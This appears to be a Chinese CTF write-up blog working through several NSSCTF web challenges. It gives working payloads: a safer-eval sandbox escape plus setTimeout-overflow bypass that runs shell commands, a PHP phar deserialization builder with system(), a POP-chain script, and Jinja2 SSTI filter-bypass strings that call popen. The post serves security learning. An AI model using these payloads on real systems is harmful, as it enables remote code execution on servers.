NSSCTF第15页(2)

[GKCTF 2020]ez三剑客-easynode

有源代码,点进来看

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

 这道题主要涉及js代码,看着几个大佬的wp进行复现的

标红的地方看到了eval函数

查看版本发现了safer-eval是1.3.6版本的

NSSCTF第15页(2)_第1张图片

发现存在该版本下的safe-eval沙箱逃逸

突围 ·期刊 #10 ·评论hol/safer-eval ·GitHub的

接下来就是这块:

app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

这里的意思就是。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay
然后作为timeout的值传入
显然。默认定义超时6秒。进入下个路由。
但是我们的代码不能超时6秒。也就不能进去下个路由执行沙盒逃逸了
那么问题就出在这个settimeout函数上。 

详解setTimeout()_settimeout函数-CSDN博客

https://www.cnblogs.com/beimingbingpo/p/8532023.html

delay传入4294967296。造成settimeout设置为1.
如果超过1毫秒。就进入eval
导致恶意代码被执行 

NSSCTF第15页(2)_第2张图片

get:  /eval?delay=4294967296 

post:   e=setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();

[HNCTF 2022 WEEK3]ez_phar

看到源码,尝试访问upload.php

NSSCTF第15页(2)_第3张图片

发现成功访问

NSSCTF第15页(2)_第4张图片 因为源码中存在file_exists()函数,可以利用phar反序列化

在PHP中的file_exists()函数-php教程-PHP中文网

PHP Phar反序列化总结_ctf phpphar反序列化-CSDN博客

基本思路就是利用上传的phar文件进行反序列化利用 

上传phar文件

class Flag{
    public $code = "system('cat /ffflllaaaggg');"; //system('ls /');
}
$a = new Flag();
 
 
$phar = new phar('b.phar');//对phar对象进行实例化,以便后续操作。
 
 
$phar -> startBuffering();//缓冲phar写操作(不用特别注意)
 
 
$phar -> setStub("");//设置stub,为固定格式
 
 
$phar -> setMetadata($a);//把我们的对象写进Metadata中
 
 
$phar -> addFromString("test.txt","helloworld!!");//写压缩文件的内容,这里没利用点,可以随便写
 
 
$phar -> stopBuffering();//停止缓冲
?> 

提示只能传图片上去

NSSCTF第15页(2)_第5张图片

 修改一下后缀,得到flag

NSSCTF第15页(2)_第6张图片 [FSCTF 2023]ez_php2

参考nssctf大佬的wp复现出来,pop链的构造还是有很大的问题

Class Rd{
    public $ending;
    public $cl;
 
    public $poc;
}

class Poc{
    public $payload;
 
    public $fun;
}
 
class Er{
    public $symbol;
    public $Flag='cat /flag';//  ls /
 
}
 
class Ha{
    public $start;
    public $start1;
    public $start2="11111";
}
 
$a=new Ha();
$a->start1=new Rd();
$a->start=['POC'=>'1111'];
$a->start1->cl=new Er();
echo serialize($a);
?>

NSSCTF第15页(2)_第7张图片

 NSSCTF第15页(2)_第8张图片

[GWCTF 2019]你的名字

输入{{7*7}}发现报错

 试了下{{7*7}}直接报错,还是报的php的错,但是{7*7}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %}

NSSCTF第15页(2)_第9张图片 [GWCTF 2019]你的名字-CSDN博客

大佬的这篇博客写的很详细

利用{% print %}可以发现有回显

{% print(lipsum|string|list) %}

NSSCTF第15页(2)_第10张图片 这里还得补充一点,{%print %}形式下,若果你构造的payload是正常的ssti用到的语句却没有回显,就说明你的语句中可能有关键字被过滤了,如{%print ‘’.class %}执行之后没有任何的回显,但{%print ‘’.clconfigass %}成功执行有回显,这说明class被过滤了

NSSCTF第15页(2)_第11张图片

让看环境变量

NSSCTF第15页(2)_第12张图片 1.拼接绕过

1.{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('env').read()%}

2.

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('env')['read']())%} 

 2.双写绕过

name={%print().__claconfigss__.__base__.__subclaconfigsses__()[258].__init__.__globals__['oconfigs'].popconfigen('env').read()%}

NSSCTF第15页(2)_第13张图片

[NSSRound#8 Basic]Upload_gogoggo

是go语言的文件上传,第一次遇到

NSSCTF第15页(2)_第14张图片

 NSSCTF Round#8 Basic-CSDN博客

弹shell一直没学会,暂时搁浅

你可能感兴趣的:(前端,javascript,开发语言)